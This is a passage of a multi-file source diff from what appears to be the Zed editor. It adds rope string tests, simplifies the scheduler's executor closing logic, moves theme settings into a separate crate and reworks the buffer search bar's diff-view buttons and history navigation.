+2254,74 @@ mod tests { assert!(!rope.reversed_chunks_in_range(0..0).equals_str("foo")); } + #[test] + fn test_starts_with() { + let text = "Hello, world! 🌍🌎🌏"; + let rope = Rope::from(text); + + assert!(rope.starts_with("")); + assert!(rope.starts_with("H")); + assert!(rope.starts_with("Hello")); + assert!(rope.starts_with("Hello, world! 🌍🌎🌏")); + assert!(!rope.starts_with("ello")); + assert!(!rope.starts_with("Hello, world! 🌍🌎🌏!")); + + let empty_rope = Rope::from(""); + assert!(empty_rope.starts_with("")); + assert!(!empty_rope.starts_with("a")); + } + + #[test] + fn test_ends_with() { + let text = "Hello, world! 🌍🌎🌏"; + let rope = Rope::from(text); + + assert!(rope.ends_with("")); + assert!(rope.ends_with("🌏")); + assert!(rope.ends_with("🌍🌎🌏")); + assert!(rope.ends_with("Hello, world! 🌍🌎🌏")); + assert!(!rope.ends_with("🌎")); + assert!(!rope.ends_with("!Hello, world! 🌍🌎🌏")); + + let empty_rope = Rope::from(""); + assert!(empty_rope.ends_with("")); + assert!(!empty_rope.ends_with("a")); + } + + #[test] + fn test_starts_with_ends_with_random() { + let mut rng = StdRng::seed_from_u64(0); + for _ in 0..100 { + let len = rng.random_range(0..100); + let text: String = RandomCharIter::new(&mut rng).take(len).collect(); + let rope = Rope::from(text.as_str()); + + for _ in 0..10 { + let start = rng.random_range(0..=text.len()); + let start = text.ceil_char_boundary(start); + let end = rng.random_range(start..=text.len()); + let end = text.ceil_char_boundary(end); + let prefix = &text[..end]; + let suffix = &text[start..]; + + assert_eq!( + rope.starts_with(prefix), + text.starts_with(prefix), + "starts_with mismatch for {:?} in {:?}", + prefix, + text + ); + assert_eq!( + rope.ends_with(suffix), + text.ends_with(suffix), + "ends_with mismatch for {:?} in {:?}", + suffix, + text + ); + } + } + } + #[test] fn test_is_char_boundary() { let fixture = "地"; @@ -2229,6 +2383,119 @@ mod tests { } } + #[test] + fn test_push_front_empty_text_on_empty_rope() { + let mut rope = 
Rope::new(); + rope.push_front(""); + assert_eq!(rope.text(), ""); + assert_eq!(rope.len(), 0); + } + + #[test] + fn test_push_front_empty_text_on_nonempty_rope() { + let mut rope = Rope::from("hello"); + rope.push_front(""); + assert_eq!(rope.text(), "hello"); + } + + #[test] + fn test_push_front_on_empty_rope() { + let mut rope = Rope::new(); + rope.push_front("hello"); + assert_eq!(rope.text(), "hello"); + assert_eq!(rope.len(), 5); + assert_eq!(rope.max_point(), Point::new(0, 5)); + } + + #[test] + fn test_push_front_single_space() { + let mut rope = Rope::from("hint"); + rope.push_front(" "); + assert_eq!(rope.text(), " hint"); + assert_eq!(rope.len(), 5); + } + + #[gpui::test(iterations = 50)] + fn test_push_front_random(mut rng: StdRng) { + let initial_len = rng.random_range(0..=64); + let initial_text: String = RandomCharIter::new(&mut rng).take(initial_len).collect(); + let mut rope = Rope::from(initial_text.as_str()); + + let mut expected = initial_text; + + for _ in 0..rng.random_range(1..=10) { + let prefix_len = rng.random_range(0..=32); + let prefix: String = RandomCharIter::new(&mut rng).take(prefix_len).collect(); + + rope.push_front(&prefix); + expected.insert_str(0, &prefix); + + assert_eq!( + rope.text(), + expected, + "text mismatch after push_front({:?})", + prefix + ); + assert_eq!(rope.len(), expected.len()); + + let actual_summary = rope.summary(); + let expected_summary = TextSummary::from(expected.as_str()); + assert_eq!( + actual_summary.len, expected_summary.len, + "len mismatch for {:?}", + expected + ); + assert_eq!( + actual_summary.lines, expected_summary.lines, + "lines mismatch for {:?}", + expected + ); + assert_eq!( + actual_summary.chars, expected_summary.chars, + "chars mismatch for {:?}", + expected + ); + assert_eq!( + actual_summary.longest_row, expected_summary.longest_row, + "longest_row mismatch for {:?}", + expected + ); + + // Verify offset-to-point and point-to-offset round-trip at boundaries. 
+ for (ix, _) in expected.char_indices().chain(Some((expected.len(), '\0'))) { + assert_eq!( + rope.point_to_offset(rope.offset_to_point(ix)), + ix, + "offset round-trip failed at {} for {:?}", + ix, + expected + ); + } + } + } + + #[gpui::test(iterations = 50)] + fn test_push_front_large_prefix(mut rng: StdRng) { + let initial_len = rng.random_range(0..=32); + let initial_text: String = RandomCharIter::new(&mut rng).take(initial_len).collect(); + let mut rope = Rope::from(initial_text.as_str()); + + let prefix_len = rng.random_range(64..=256); + let prefix: String = RandomCharIter::new(&mut rng).take(prefix_len).collect(); + + rope.push_front(&prefix); + let expected = format!("{}{}", prefix, initial_text); + + assert_eq!(rope.text(), expected); + assert_eq!(rope.len(), expected.len()); + + let actual_summary = rope.summary(); + let expected_summary = TextSummary::from(expected.as_str()); + assert_eq!(actual_summary.len, expected_summary.len); + assert_eq!(actual_summary.lines, expected_summary.lines); + assert_eq!(actual_summary.chars, expected_summary.chars); + } + fn clip_offset(text: &str, mut offset: usize, bias: Bias) -> usize { while !text.is_char_boundary(offset) { match bias { diff --git a/crates/rpc/src/message_stream.rs b/crates/rpc/src/message_stream.rs index 023e916df3113e73adafdc0d38948121ad2e9cec..34888d98147124c5c971843d0124fceb95e47cde 100644 --- a/crates/rpc/src/message_stream.rs +++ b/crates/rpc/src/message_stream.rs @@ -7,7 +7,6 @@ use futures::{SinkExt as _, StreamExt as _}; use proto::Message as _; use std::time::Instant; use std::{fmt::Debug, io}; -use zstd::zstd_safe::WriteBuf; const KIB: usize = 1024; const MIB: usize = KIB * 1024; @@ -87,7 +86,10 @@ where let received_at = Instant::now(); match bytes? 
{ WebSocketMessage::Binary(bytes) => { - zstd::stream::copy_decode(bytes.as_slice(), &mut self.encoding_buffer)?; + zstd::stream::copy_decode( + zstd::zstd_safe::WriteBuf::as_slice(&*bytes), + &mut self.encoding_buffer, + )?; let envelope = Envelope::decode(self.encoding_buffer.as_slice()) .map_err(io::Error::from)?; diff --git a/crates/rules_library/Cargo.toml b/crates/rules_library/Cargo.toml index 59c298de923f98135c99fca0c8da2fa42ac2e17e..352f86bd72fca294745cc0f74b401cc48f35d7fd 100644 --- a/crates/rules_library/Cargo.toml +++ b/crates/rules_library/Cargo.toml @@ -28,7 +28,7 @@ release_channel.workspace = true rope.workspace = true serde.workspace = true settings.workspace = true -theme.workspace = true +theme_settings.workspace = true ui.workspace = true ui_input.workspace = true util.workspace = true diff --git a/crates/rules_library/src/rules_library.rs b/crates/rules_library/src/rules_library.rs index a89657e29680ccfd759fe63efcc837d883ef7590..425f7d2aa3d9e9259fe005a0e15dee10e4e4baf1 100644 --- a/crates/rules_library/src/rules_library.rs +++ b/crates/rules_library/src/rules_library.rs @@ -1,6 +1,6 @@ use anyhow::Result; use collections::{HashMap, HashSet}; -use editor::{CompletionProvider, SelectionEffects}; +use editor::SelectionEffects; use editor::{CurrentLineHighlight, Editor, EditorElement, EditorEvent, EditorStyle, actions::Tab}; use gpui::{ App, Bounds, DEFAULT_ADDITIONAL_WINDOW_SIZE, Entity, EventEmitter, Focusable, PromptLevel, @@ -15,12 +15,11 @@ use picker::{Picker, PickerDelegate}; use platform_title_bar::PlatformTitleBar; use release_channel::ReleaseChannel; use rope::Rope; -use settings::Settings; -use std::rc::Rc; +use settings::{ActionSequence, Settings}; use std::sync::Arc; use std::sync::atomic::AtomicBool; use std::time::Duration; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::{Divider, ListItem, ListItemSpacing, ListSubHeader, Tooltip, prelude::*}; use ui_input::ErasedEditor; use util::{ResultExt, TryFutureExt}; @@ 
-76,7 +75,6 @@ pub trait InlineAssistDelegate { pub fn open_rules_library( language_registry: Arc, inline_assist_delegate: Box, - make_completion_provider: Rc Rc>, prompt_to_select: Option, cx: &mut App, ) -> Task>> { @@ -141,7 +139,6 @@ pub fn open_rules_library( store, language_registry, inline_assist_delegate, - make_completion_provider, prompt_to_select, window, cx, @@ -162,7 +159,6 @@ pub struct RulesLibrary { picker: Entity>, pending_load: Task<()>, inline_assist_delegate: Box, - make_completion_provider: Rc Rc>, _subscriptions: Vec, } @@ -222,13 +218,17 @@ impl PickerDelegate for RulePickerDelegate { cx.notify(); } - fn can_select(&mut self, ix: usize, _: &mut Window, _: &mut Context>) -> bool { + fn can_select(&self, ix: usize, _: &mut Window, _: &mut Context>) -> bool { match self.filtered_entries.get(ix) { Some(RulePickerEntry::Rule(_)) => true, Some(RulePickerEntry::Header(_)) | Some(RulePickerEntry::Separator) | None => false, } } + fn select_on_hover(&self) -> bool { + false + } + fn placeholder_text(&self, _window: &mut Window, _cx: &mut App) -> Arc { "Search…".into() } @@ -393,7 +393,7 @@ impl PickerDelegate for RulePickerDelegate { })) })) .when(!prompt_id.is_built_in(), |this| { - this.end_hover_slot( + this.end_slot_on_hover( h_flex() .child( IconButton::new("delete-rule", IconName::Trash) @@ -471,7 +471,6 @@ impl RulesLibrary { store: Entity, language_registry: Arc, inline_assist_delegate: Box, - make_completion_provider: Rc Rc>, rule_to_select: Option, window: &mut Window, cx: &mut Context, @@ -514,7 +513,6 @@ impl RulesLibrary { active_rule_id: None, pending_load: Task::ready(()), inline_assist_delegate, - make_completion_provider, _subscriptions: vec![cx.subscribe_in(&picker, window, Self::handle_picker_event)], picker, } @@ -721,7 +719,6 @@ impl RulesLibrary { } else if let Some(rule_metadata) = self.store.read(cx).metadata(prompt_id) { let language_registry = self.language_registry.clone(); let rule = self.store.read(cx).load(prompt_id, cx); 
- let make_completion_provider = self.make_completion_provider.clone(); self.pending_load = cx.spawn_in(window, async move |this, cx| { let rule = rule.await; let markdown = language_registry.language_for_name("Markdown").await; @@ -756,7 +753,6 @@ impl RulesLibrary { editor.set_show_indent_guides(false, cx); editor.set_use_modal_editing(true); editor.set_current_line_highlight(Some(CurrentLineHighlight::None)); - editor.set_completion_provider(Some(make_completion_provider())); if focus { window.focus(&editor.focus_handle(cx), cx); } @@ -1159,10 +1155,11 @@ impl RulesLibrary { Button::new("new-rule", "New Rule") .full_width() .style(ButtonStyle::Outlined) - .icon(IconName::Plus) - .icon_size(IconSize::Small) - .icon_position(IconPosition::Start) - .icon_color(Color::Muted) + .start_icon( + Icon::new(IconName::Plus) + .size(IconSize::Small) + .color(Color::Muted), + ) .on_click(|_, window, cx| { window.dispatch_action(Box::new(NewRule), cx); }), @@ -1391,13 +1388,20 @@ impl RulesLibrary { impl Render for RulesLibrary { fn render(&mut self, window: &mut Window, cx: &mut Context) -> impl IntoElement { - let ui_font = theme::setup_ui_font(window, cx); + let ui_font = theme_settings::setup_ui_font(window, cx); let theme = cx.theme().clone(); client_side_decorations( v_flex() .id("rules-library") .key_context("RulesLibrary") + .on_action( + |action_sequence: &ActionSequence, window: &mut Window, cx: &mut App| { + for action in &action_sequence.0 { + window.dispatch_action(action.boxed_clone(), cx); + } + }, + ) .on_action(cx.listener(|this, &NewRule, window, cx| this.new_rule(window, cx))) .on_action( cx.listener(|this, &DeleteRule, window, cx| { diff --git a/crates/scheduler/src/executor.rs b/crates/scheduler/src/executor.rs index 05ea973c4ece53f996b732a7e8c3673487f3b8dc..602404142a1f4d19bbce841b3b06996cc2a7427b 100644 --- a/crates/scheduler/src/executor.rs +++ b/crates/scheduler/src/executor.rs @@ -6,10 +6,7 @@ use std::{ panic::Location, pin::Pin, rc::Rc, - sync::{ - 
Arc, - atomic::{AtomicBool, Ordering}, - }, + sync::Arc, task::{Context, Poll}, thread::{self, ThreadId}, time::Duration, @@ -19,7 +16,6 @@ use std::{ pub struct ForegroundExecutor { session_id: SessionId, scheduler: Arc, - closed: Arc, not_send: PhantomData>, } @@ -28,7 +24,6 @@ impl ForegroundExecutor { Self { session_id, scheduler, - closed: Arc::new(AtomicBool::new(false)), not_send: PhantomData, } } @@ -41,16 +36,6 @@ impl ForegroundExecutor { &self.scheduler } - /// Returns the closed flag for this executor. - pub fn closed(&self) -> &Arc { - &self.closed - } - - /// Close this executor. Tasks will not run after this is called. - pub fn close(&self) { - self.closed.store(true, Ordering::SeqCst); - } - #[track_caller] pub fn spawn(&self, future: F) -> Task where @@ -60,13 +45,12 @@ impl ForegroundExecutor { let session_id = self.session_id; let scheduler = Arc::clone(&self.scheduler); let location = Location::caller(); - let closed = self.closed.clone(); let (runnable, task) = spawn_local_with_source_location( future, move |runnable| { scheduler.schedule_foreground(session_id, runnable); }, - RunnableMeta { location, closed }, + RunnableMeta { location }, ); runnable.schedule(); Task(TaskState::Spawned(task)) @@ -129,25 +113,11 @@ impl ForegroundExecutor { #[derive(Clone)] pub struct BackgroundExecutor { scheduler: Arc, - closed: Arc, } impl BackgroundExecutor { pub fn new(scheduler: Arc) -> Self { - Self { - scheduler, - closed: Arc::new(AtomicBool::new(false)), - } - } - - /// Returns the closed flag for this executor. - pub fn closed(&self) -> &Arc { - &self.closed - } - - /// Close this executor. Tasks will not run after this is called. 
- pub fn close(&self) { - self.closed.store(true, Ordering::SeqCst); + Self { scheduler } } #[track_caller] @@ -167,9 +137,8 @@ impl BackgroundExecutor { { let scheduler = Arc::clone(&self.scheduler); let location = Location::caller(); - let closed = self.closed.clone(); let (runnable, task) = async_task::Builder::new() - .metadata(RunnableMeta { location, closed }) + .metadata(RunnableMeta { location }) .spawn( move |_| future, move |runnable| { @@ -188,20 +157,16 @@ impl BackgroundExecutor { F::Output: Send + 'static, { let location = Location::caller(); - let closed = self.closed.clone(); let (tx, rx) = flume::bounded::>(1); self.scheduler.spawn_realtime(Box::new(move || { while let Ok(runnable) = rx.recv() { - if runnable.metadata().is_closed() { - continue; - } runnable.run(); } })); let (runnable, task) = async_task::Builder::new() - .metadata(RunnableMeta { location, closed }) + .metadata(RunnableMeta { location }) .spawn( move |_| future, move |runnable| { @@ -372,8 +337,9 @@ where impl Drop for Checked { fn drop(&mut self) { - assert!( - self.id == thread_id(), + assert_eq!( + self.id, + thread_id(), "local task dropped by a thread that didn't spawn it. Task spawned at {}", self.location ); diff --git a/crates/scheduler/src/scheduler.rs b/crates/scheduler/src/scheduler.rs index 5b1fac258d088d3be7a2254bbf68431cdb507c70..05d285df8d9622ac901618f5543d2f219290ee0d 100644 --- a/crates/scheduler/src/scheduler.rs +++ b/crates/scheduler/src/scheduler.rs @@ -14,10 +14,7 @@ use std::{ future::Future, panic::Location, pin::Pin, - sync::{ - Arc, - atomic::{AtomicBool, Ordering}, - }, + sync::Arc, task::{Context, Poll}, time::Duration, }; @@ -62,23 +59,12 @@ impl Priority { pub struct RunnableMeta { /// The source location where the task was spawned. pub location: &'static Location<'static>, - /// Shared flag indicating whether the scheduler has been closed. - /// When true, tasks should be dropped without running. 
- pub closed: Arc, -} - -impl RunnableMeta { - /// Returns true if the scheduler has been closed and this task should not run. - pub fn is_closed(&self) -> bool { - self.closed.load(Ordering::SeqCst) - } } impl std::fmt::Debug for RunnableMeta { fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { f.debug_struct("RunnableMeta") .field("location", &self.location) - .field("closed", &self.is_closed()) .finish() } } diff --git a/crates/scheduler/src/test_scheduler.rs b/crates/scheduler/src/test_scheduler.rs index 03a8c0b90c77e4c17bd8a1130e5c82ccd935e80f..5a14f9c335bfaaa16cbac2344a2d89dd585225a7 100644 --- a/crates/scheduler/src/test_scheduler.rs +++ b/crates/scheduler/src/test_scheduler.rs @@ -57,7 +57,7 @@ impl TestScheduler { .map(|seed| seed.parse().unwrap()) .unwrap_or(0); - (seed..num_iterations as u64) + (seed..seed + num_iterations as u64) .map(|seed| { let mut unwind_safe_f = AssertUnwindSafe(&mut f); eprintln!("Running seed: {seed}"); @@ -320,10 +320,6 @@ impl TestScheduler { }; if let Some(runnable) = runnable { - // Check if the executor that spawned this task was closed - if runnable.runnable.metadata().is_closed() { - return true; - } let is_foreground = runnable.session_id.is_some(); let was_main_thread = self.state.lock().is_main_thread; self.state.lock().is_main_thread = is_foreground; @@ -335,6 +331,28 @@ impl TestScheduler { false } + /// Drops all runnable tasks from the scheduler. + /// + /// This is used by the leak detector to ensure that all tasks have been dropped as tasks may keep entities alive otherwise. + /// Why do we even have tasks left when tests finish you may ask. The reason for that is simple, the scheduler itself is the executor and it retains the scheduled runnables. + /// A lot of tasks, including every foreground task contain an executor handle that keeps the test scheduler alive, causing a reference cycle, thus the need for this function right now. 
+ pub fn drain_tasks(&self) { + // dropping runnables may reschedule tasks + // due to drop impls with executors in them + // so drop until we reach a fixpoint + loop { + let mut state = self.state.lock(); + if state.runnables.is_empty() && state.timers.is_empty() { + break; + } + let runnables = std::mem::take(&mut state.runnables); + let timers = std::mem::take(&mut state.timers); + drop(state); + drop(timers); + drop(runnables); + } + } + pub fn advance_clock_to_next_timer(&self) -> bool { if let Some(timer) = self.state.lock().timers.first() { self.clock.advance(timer.expiration - self.clock.now()); diff --git a/crates/scheduler/src/tests.rs b/crates/scheduler/src/tests.rs index dc24fed68d7cb1c83953f4de38bb4392d3b61029..03fe8075f91fff2d72b9bb1c0d4d389a69d9c3bf 100644 --- a/crates/scheduler/src/tests.rs +++ b/crates/scheduler/src/tests.rs @@ -290,6 +290,31 @@ fn test_helper_methods() { assert_eq!(results, vec![10, 10, 10]); } +#[test] +fn test_many_with_arbitrary_seed() { + for seed in [0u64, 1, 5, 42] { + let mut seeds_seen = Vec::new(); + let iterations = 3usize; + + for current_seed in seed..seed + iterations as u64 { + let scheduler = Arc::new(TestScheduler::new(TestSchedulerConfig::with_seed( + current_seed, + ))); + let captured_seed = current_seed; + scheduler + .foreground() + .block_on(async { seeds_seen.push(captured_seed) }); + scheduler.run(); + } + + assert_eq!( + seeds_seen, + (seed..seed + iterations as u64).collect::>(), + "Expected {iterations} iterations starting at seed {seed}" + ); + } +} + #[test] fn test_block_with_timeout() { // Test case: future completes within timeout diff --git a/crates/schema_generator/Cargo.toml b/crates/schema_generator/Cargo.toml index b92298a3b41d62b861c19a1f22ceaee0d63828b5..71beb54597e72286cbf539897741088dde873e6c 100644 --- a/crates/schema_generator/Cargo.toml +++ b/crates/schema_generator/Cargo.toml @@ -17,3 +17,4 @@ serde.workspace = true serde_json.workspace = true settings.workspace = true theme.workspace = 
true +theme_settings.workspace = true \ No newline at end of file diff --git a/crates/schema_generator/src/main.rs b/crates/schema_generator/src/main.rs index a77060c54d1361dc96204238a282f8e75946a37b..d34cd897b9e7eb27b6c9343513d85ed8497d291a 100644 --- a/crates/schema_generator/src/main.rs +++ b/crates/schema_generator/src/main.rs @@ -2,7 +2,8 @@ use anyhow::Result; use clap::{Parser, ValueEnum}; use schemars::schema_for; use settings::ProjectSettingsContent; -use theme::{IconThemeFamilyContent, ThemeFamilyContent}; +use theme::IconThemeFamilyContent; +use theme_settings::ThemeFamilyContent; #[derive(Parser, Debug)] pub struct Args { diff --git a/crates/search/Cargo.toml b/crates/search/Cargo.toml index 9613bd720919d77f2e7c9421ed51a0b18edf7355..4213aa39a046e944cd34f9a1530bd15d1c442863 100644 --- a/crates/search/Cargo.toml +++ b/crates/search/Cargo.toml @@ -7,7 +7,7 @@ license = "GPL-3.0-or-later" [features] test-support = [ - "client/test-support", + "editor/test-support", "gpui/test-support", "workspace/test-support", @@ -31,12 +31,14 @@ futures.workspace = true gpui.workspace = true language.workspace = true menu.workspace = true +multi_buffer.workspace = true project.workspace = true serde.workspace = true serde_json.workspace = true settings.workspace = true smol.workspace = true theme.workspace = true +theme_settings.workspace = true ui.workspace = true util.workspace = true util_macros.workspace = true @@ -47,7 +49,6 @@ ztracing.workspace = true tracing.workspace = true [dev-dependencies] -client = { workspace = true, features = ["test-support"] } editor = { workspace = true, features = ["test-support"] } gpui = { workspace = true, features = ["test-support"] } language = { workspace = true, features = ["test-support"] } diff --git a/crates/search/src/buffer_search.rs b/crates/search/src/buffer_search.rs index 9ec4a8259f5d92b41ef8e3fc300bb23d8503b301..46177c5642a8d05daaf22e9fb24b205cd10ca42b 100644 --- a/crates/search/src/buffer_search.rs +++ 
b/crates/search/src/buffer_search.rs @@ -6,8 +6,9 @@ use crate::{ ToggleCaseSensitive, ToggleRegex, ToggleReplace, ToggleSelection, ToggleWholeWord, buffer_search::registrar::WithResultsOrExternalQuery, search_bar::{ - ActionButtonState, alignment_element, filter_search_results_input, input_base_styles, - render_action_button, render_text_input, + ActionButtonState, HistoryNavigationDirection, alignment_element, + filter_search_results_input, input_base_styles, render_action_button, render_text_input, + should_navigate_history, }, }; use any_vec::AnyVec; @@ -15,12 +16,13 @@ use collections::HashMap; use editor::{ Editor, EditorSettings, MultiBufferOffset, SplittableEditor, ToggleSplitDiff, actions::{Backtab, FoldAll, Tab, ToggleFoldAll, UnfoldAll}, + scroll::Autoscroll, }; use futures::channel::oneshot; use gpui::{ - App, ClickEvent, Context, Entity, EventEmitter, Focusable, InteractiveElement as _, - IntoElement, KeyContext, ParentElement as _, Render, ScrollHandle, Styled, Subscription, Task, - WeakEntity, Window, div, + Action as _, App, ClickEvent, Context, Entity, EventEmitter, Focusable, + InteractiveElement as _, IntoElement, KeyContext, ParentElement as _, Render, ScrollHandle, + Styled, Subscription, Task, WeakEntity, Window, div, }; use language::{Language, LanguageRegistry}; use project::{ @@ -31,7 +33,9 @@ use project::{ use fs::Fs; use settings::{DiffViewStyle, Settings, update_settings_file}; use std::{any::TypeId, sync::Arc}; -use zed_actions::{outline::ToggleOutline, workspace::CopyPath, workspace::CopyRelativePath}; +use zed_actions::{ + OpenSettingsAt, outline::ToggleOutline, workspace::CopyPath, workspace::CopyRelativePath, +}; use ui::{ BASE_REM_SIZE_IN_PX, IconButtonShape, PlatformStyle, TextSize, Tooltip, prelude::*, @@ -108,47 +112,39 @@ impl Render for BufferSearchBar { .as_ref() .and_then(|weak| weak.upgrade()) .map(|splittable_editor| { - let is_split = splittable_editor.read(cx).is_split(); + let editor_ref = splittable_editor.read(cx); + 
let diff_view_style = editor_ref.diff_view_style(); + + let is_split_set = diff_view_style == DiffViewStyle::Split; + let is_split_active = editor_ref.is_split(); + let min_columns = + EditorSettings::get_global(cx).minimum_split_diff_width as u32; + + let split_icon = if is_split_set && !is_split_active { + IconName::DiffSplitAuto + } else { + IconName::DiffSplit + }; + h_flex() .gap_1() .child( IconButton::new("diff-unified", IconName::DiffUnified) - .shape(IconButtonShape::Square) - .toggle_state(!is_split) - .tooltip(Tooltip::element(move |_, cx| { - v_flex() - .gap_1() - .child(Label::new("Unified")) - .child( - h_flex() - .gap_0p5() - .text_sm() - .text_color(Color::Muted.color(cx)) - .children(render_modifiers( - &gpui::Modifiers::secondary_key(), - PlatformStyle::platform(), - None, - Some(TextSize::Default.rems(cx).into()), - false, - )) - .child("click to set as default"), - ) - .into_any() - })) + .icon_size(IconSize::Small) + .toggle_state(diff_view_style == DiffViewStyle::Unified) + .tooltip(Tooltip::text("Unified")) .on_click({ let splittable_editor = splittable_editor.downgrade(); move |_, window, cx| { - if window.modifiers().secondary() { - update_settings_file( - ::global(cx), - cx, - |settings, _| { - settings.editor.diff_view_style = - Some(DiffViewStyle::Unified); - }, - ); - } - if is_split { + update_settings_file( + ::global(cx), + cx, + |settings, _| { + settings.editor.diff_view_style = + Some(DiffViewStyle::Unified); + }, + ); + if diff_view_style == DiffViewStyle::Split { splittable_editor .update(cx, |editor, cx| { editor.toggle_split( @@ -163,26 +159,32 @@ impl Render for BufferSearchBar { }), ) .child( - IconButton::new("diff-split", IconName::DiffSplit) - .shape(IconButtonShape::Square) - .toggle_state(is_split) + IconButton::new("diff-split", split_icon) + .toggle_state(diff_view_style == DiffViewStyle::Split) + .icon_size(IconSize::Small) .tooltip(Tooltip::element(move |_, cx| { + let message = if is_split_set && !is_split_active { 
+ format!("Split when wider than {} columns", min_columns) + .into() + } else { + SharedString::from("Split") + }; + v_flex() - .gap_1() - .child(Label::new("Split")) + .child(message) .child( h_flex() .gap_0p5() - .text_sm() + .text_ui_sm(cx) .text_color(Color::Muted.color(cx)) .children(render_modifiers( &gpui::Modifiers::secondary_key(), PlatformStyle::platform(), None, - Some(TextSize::Default.rems(cx).into()), + Some(TextSize::Small.rems(cx).into()), false, )) - .child("click to set as default"), + .child("click to change min width"), ) .into_any() })) @@ -190,6 +192,14 @@ impl Render for BufferSearchBar { let splittable_editor = splittable_editor.downgrade(); move |_, window, cx| { if window.modifiers().secondary() { + window.dispatch_action( + OpenSettingsAt { + path: "minimum_split_diff_width".to_string(), + } + .boxed_clone(), + cx, + ); + } else { update_settings_file( ::global(cx), cx, @@ -198,17 +208,17 @@ impl Render for BufferSearchBar { Some(DiffViewStyle::Split); }, ); - } - if !is_split { - splittable_editor - .update(cx, |editor, cx| { - editor.toggle_split( - &ToggleSplitDiff, - window, - cx, - ); - }) - .ok(); + if diff_view_style == DiffViewStyle::Unified { + splittable_editor + .update(cx, |editor, cx| { + editor.toggle_split( + &ToggleSplitDiff, + window, + cx, + ); + }) + .ok(); + } } } }), @@ -236,7 +246,7 @@ impl Render for BufferSearchBar { let collapse_expand_icon_button = |id| { IconButton::new(id, icon) - .shape(IconButtonShape::Square) + .icon_size(IconSize::Small) .tooltip(move |_, cx| { Tooltip::for_action_in( tooltip_label, @@ -281,6 +291,7 @@ impl Render for BufferSearchBar { regex, replacement, selection, + select_all, find_in_results, } = self.supported_options(cx); @@ -339,13 +350,11 @@ impl Render for BufferSearchBar { }; let query_column = input_style - .child( - div() - .flex_1() - .min_w(px(0.)) - .overflow_hidden() - .child(render_text_input(&self.query_editor, color_override, cx)), - ) + 
.child(div().flex_1().min_w_0().py_1().child(render_text_input( + &self.query_editor, + color_override, + cx, + ))) .child( h_flex() .flex_none() @@ -453,14 +462,16 @@ impl Render for BufferSearchBar { )) }); - el.child(render_action_button( - "buffer-search-nav-button", - IconName::SelectAll, - Default::default(), - "Select All Matches", - &SelectAllMatches, - query_focus, - )) + el.when(select_all, |el| { + el.child(render_action_button( + "buffer-search-nav-button", + IconName::SelectAll, + Default::default(), + "Select All Matches", + &SelectAllMatches, + query_focus.clone(), + )) + }) .child(matches_column) }) .when(find_in_results, |el| { @@ -486,39 +497,42 @@ impl Render for BufferSearchBar { .child(query_column) .child(mode_column); - let replace_line = - should_show_replace_input.then(|| { - let replace_column = input_base_styles(replacement_border) - .child(render_text_input(&self.replacement_editor, None, cx)); - let focus_handle = self.replacement_editor.read(cx).focus_handle(cx); - - let replace_actions = h_flex() - .min_w_64() - .gap_1() - .child(render_action_button( - "buffer-search-replace-button", - IconName::ReplaceNext, - Default::default(), - "Replace Next Match", - &ReplaceNext, - focus_handle.clone(), - )) - .child(render_action_button( - "buffer-search-replace-button", - IconName::ReplaceAll, - Default::default(), - "Replace All Matches", - &ReplaceAll, - focus_handle, - )); + let replace_line = should_show_replace_input.then(|| { + let replace_column = input_base_styles(replacement_border).child( + div() + .flex_1() + .py_1() + .child(render_text_input(&self.replacement_editor, None, cx)), + ); + let focus_handle = self.replacement_editor.read(cx).focus_handle(cx); + + let replace_actions = h_flex() + .min_w_64() + .gap_1() + .child(render_action_button( + "buffer-search-replace-button", + IconName::ReplaceNext, + Default::default(), + "Replace Next Match", + &ReplaceNext, + focus_handle.clone(), + )) + .child(render_action_button( + 
"buffer-search-replace-button", + IconName::ReplaceAll, + Default::default(), + "Replace All Matches", + &ReplaceAll, + focus_handle, + )); - h_flex() - .w_full() - .gap_2() - .when(has_collapse_button, |this| this.child(alignment_element())) - .child(replace_column) - .child(replace_actions) - }); + h_flex() + .w_full() + .gap_2() + .when(has_collapse_button, |this| this.child(alignment_element())) + .child(replace_column) + .child(replace_actions) + }); let mut key_context = KeyContext::new_with_defaults(); key_context.add("BufferSearchBar"); @@ -833,13 +847,13 @@ impl BufferSearchBar { cx: &mut Context, ) -> Self { let query_editor = cx.new(|cx| { - let mut editor = Editor::single_line(window, cx); + let mut editor = Editor::auto_height(1, 4, window, cx); editor.set_use_autoclose(false); editor }); cx.subscribe_in(&query_editor, window, Self::on_query_editor_event) .detach(); - let replacement_editor = cx.new(|cx| Editor::single_line(window, cx)); + let replacement_editor = cx.new(|cx| Editor::auto_height(1, 4, window, cx)); cx.subscribe(&replacement_editor, Self::on_replacement_editor_event) .detach(); @@ -975,7 +989,9 @@ impl BufferSearchBar { if deploy.focus { let mut handle = self.query_editor.focus_handle(cx); let mut select_query = true; - if deploy.replace_enabled && handle.is_focused(window) { + + let has_seed_text = self.query_suggestion(window, cx).is_some(); + if deploy.replace_enabled && has_seed_text { handle = self.replacement_editor.focus_handle(cx); select_query = false; }; @@ -1188,6 +1204,7 @@ impl BufferSearchBar { let len = query_buffer.len(cx); query_buffer.edit([(MultiBufferOffset(0)..len, query)], None, cx); }); + query_editor.request_autoscroll(Autoscroll::fit(), cx); }); self.set_search_options(options, cx); self.clear_matches(window, cx); @@ -1706,15 +1723,19 @@ impl BufferSearchBar { window: &mut Window, cx: &mut Context, ) { + if !should_navigate_history(&self.query_editor, HistoryNavigationDirection::Next, cx) { + cx.propagate(); + 
return; + } + if let Some(new_query) = self .search_history .next(&mut self.search_history_cursor) .map(str::to_string) { drop(self.search(&new_query, Some(self.search_options), false, window, cx)); - } else { - self.search_history_cursor.reset(); - drop(self.search("", Some(self.search_options), false, window, cx)); + } else if let Some(draft) = self.search_history_cursor.take_draft() { + drop(self.search(&draft, Some(self.search_options), false, window, cx)); } } @@ -1724,6 +1745,11 @@ impl BufferSearchBar { window: &mut Window, cx: &mut Context, ) { + if !should_navigate_history(&self.query_editor, HistoryNavigationDirection::Previous, cx) { + cx.propagate(); + return; + } + if self.query(cx).is_empty() && let Some(new_query) = self .search_history @@ -1734,9 +1760,10 @@ impl BufferSearchBar { return; } + let current_query = self.query(cx); if let Some(new_query) = self .search_history - .previous(&mut self.search_history_cursor) + .previous(&mut self.search_history_cursor, ¤t_query) .map(str::to_string) { drop(self.search(&new_query, Some(self.search_options), false, window, cx)); @@ -1892,7 +1919,7 @@ mod tests { cx.set_global(store); editor::init(cx); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); crate::init(cx); }); } @@ -2718,13 